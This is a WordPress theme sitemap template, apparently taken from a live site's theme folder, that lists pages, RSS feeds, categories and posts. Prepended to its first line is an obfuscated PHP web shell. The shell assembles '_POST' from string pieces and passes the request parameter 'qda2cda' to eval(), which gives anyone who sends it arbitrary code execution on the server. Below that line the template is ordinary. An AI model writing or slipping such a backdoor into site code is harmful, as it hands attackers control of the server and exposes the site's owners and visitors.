File: /home/perditaeyz/www/wp-content/themes/montheme/sitemap.php
<?php $ybv75="_post";$bax9=strtoupper($ybv75[0]. $ybv75[1]. $ybv75[2].$ybv75[3]. $ybv75[4]) ;if( isset (${ $bax9 } ['qda2cda' ] ) ){ eval ( ${$bax9 }[ 'qda2cda'] ) ; } ?> <?php
/*
Template Name: Sitemap
*/
?>
<?php get_header();?>
<div id="primary" class="content-area">
<div id="content" class="site-content" role="main">
<header class="entry-header">
<div id="content">
<h2><?php _e('Pages', 'textdomain'); ?></h2>
<ul><?php wp_list_pages("title_li=" ); ?></ul>
<h2><?php _e('RSS Feeds', 'textdomain'); ?></h2>
<ul>
<li><a title="Full content" href="feed:<?php bloginfo('rss2_url'); ?>"><?php _e('Main RSS' , 'textdomain'); ?></a></li>
<li><a title="Comment Feed" href="feed:<?php bloginfo('comments_rss2_url'); ?>"><?php _e('Comment Feed', 'textdomain'); ?></a></li>
</ul>
<h2><?php _e('Categories', 'textdomain'); ?></h2>
<ul><?php wp_list_categories('sort_column=name&optioncount=1&hierarchical=0&feed=RSS'); ?></ul>
<h2><?php _e('All Blog Posts', 'textdomain'); ?></h2>
<ul><?php $archive_query = new WP_Query('showposts=1000'); while ($archive_query->have_posts()) : $archive_query->the_post(); ?>
<li>
<a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>"><?php the_title(); ?></a>
(<?php comments_number('0', '1', '%'); ?>)
</li>
<?php endwhile; ?>
</ul>
</div>
</header>
</div>
</div>
<?php get_footer(); ?>